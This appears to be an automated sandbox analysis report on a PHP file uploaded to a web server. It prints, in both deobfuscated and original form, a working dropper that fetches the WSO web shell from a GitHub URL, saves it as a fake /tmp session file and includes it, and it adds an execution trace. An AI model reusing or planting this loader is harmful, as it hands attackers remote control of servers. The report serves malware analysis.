Screenshot
Attributes
Files
file_get_contents (Deobfuscated, Original)

URLs
https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso.php (Deobfuscated, Original)

Deobfuscated PHP code
<?php

#tmp shell by odiq $URL = 'https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso.php'; #admin $TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; function M() { $FGT = @file_get_contents($GLOBALS['URL']); if(!$FGT) { echo `curl -k $(echo {$GLOBALS['URL']}) > {$GLOBALS['TMP']}`; } else { $HANDLE = fopen($GLOBALS['TMP'], 'w'); fwrite($HANDLE, $FGT); fclose($HANDLE); } echo '<script>window.location="?work";</script>'; } if(file_exists($TMP)) { if(filesize($TMP) === 0) { unlink($TMP); M(); } else { include($TMP); } } else { M(); }
Execution traces
data/traces/d8801ee10a23fbeb3f4176611d52ca09_trace-1676237321.5365.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:29:07.434327]
1	0	1	0.000153	393512
1	3	0	0.000199	392952	{main}	1		/var/www/html/uploads/bepas.php	0	0
1	3	1	0.000215	392952
			0.000240	314224
TRACE END   [2023-02-12 19:29:07.434448]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php #tmp shell by odiq $URL = 'https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso.php'; #admin $TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; function M() { $FGT = @file_get_contents($GLOBALS['URL']); if(!$FGT) { echo `curl -k $(echo {$GLOBALS['URL']}) > {$GLOBALS['TMP']}`; } else { $HANDLE = fopen($GLOBALS['TMP'], 'w'); fwrite($HANDLE, $FGT); fclose($HANDLE); } echo '<script>window.location="?work";</script>'; } if(file_exists($TMP)) { if(filesize($TMP) === 0) { unlink($TMP); M(); } else { include($TMP); } } else { M(); } ?>